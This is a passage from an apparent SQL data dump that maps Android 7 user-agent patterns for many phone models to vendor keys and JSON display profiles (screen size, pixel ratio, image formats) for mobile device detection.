Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; HUAWEI NMO-L31) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; HUAWEI NXT-L09) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; HUAWEI NXT-L29) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; HUAWEI RIO-L01) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; HUAWEI VNS-L21) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; HUAWEI VNS-L22) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; HUAWEI VNS-L23) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; HUAWEI VNS-L31) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; HUAWEI VNS-L53) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; HWV31) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Haier G32) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Hammer AXE Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Hammer Active) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Hammer Energy 3G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Hammer Energy) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Hammer Iron 2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Hammer Titan 2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Hawk_from_EE) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Hisense C30 Lite) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_hisense','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Hisense C30) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_hisense','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Hisense F10) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_hisense','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Hisense F102) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_hisense','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Hisense F17 Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_hisense','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Hisense F17) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_hisense','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Hisense F22) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_hisense','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Hisense F23) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_hisense','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Hisense F24) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_hisense','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Hisense F32) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_hisense','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Hisense Infinity H11) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_hisense','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Hisense T5 Plus) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_hisense','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Hisense U601S) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_hisense','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Hummer) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; ID bot 53) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; IF9001) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; IF9007) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; IMPRESS CLICK) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; INOI_2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; INOI_2_LITE) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; INOI_3_LITE) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; INOI_6_Lite) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; INTEX AQUA A4 PLUS) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; INTEX AQUA JEWEL 2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; INTEX AQUA LIONS 2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; IS2PLUS) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; IS2S) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; I_STAR_PLUS) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Ilium L1120) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Ilium L620) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Ilium L920) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Ilium LT520) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Ilium X520) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; ImSmart A554) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Impress Disco) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Impress_Action) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":376,\"screenHeight\":627,\"pixelRatio\":1.275,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Impress_Bear) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Impress_Calypso) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Impress_Dune) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Impress_Eagle) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Impress_Energy) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Impress_Frost) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Impress_Game) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Impress_Grip) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Impress_Groove) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Impress_Lagune) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Impress_Life) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Impress_Lion_3G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Impress_Lion_4G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Impress_Luck) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Impress_Pear) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Impress_Play) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Impress_Ra) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Impress_Razor) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Impress_Saturn) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Impress_Tor) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Impress_Vega) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Impress_Wolf) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Infinix HOT 4 Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_infinix','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Infinix HOT 4) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_infinix','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Infinix NOTE 3 Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_infinix','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Infinix S2 Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_infinix','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Infinix S2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_infinix','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Infinix X5010) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_infinix','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Infinix X559) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_infinix','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Infinix X559C) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile 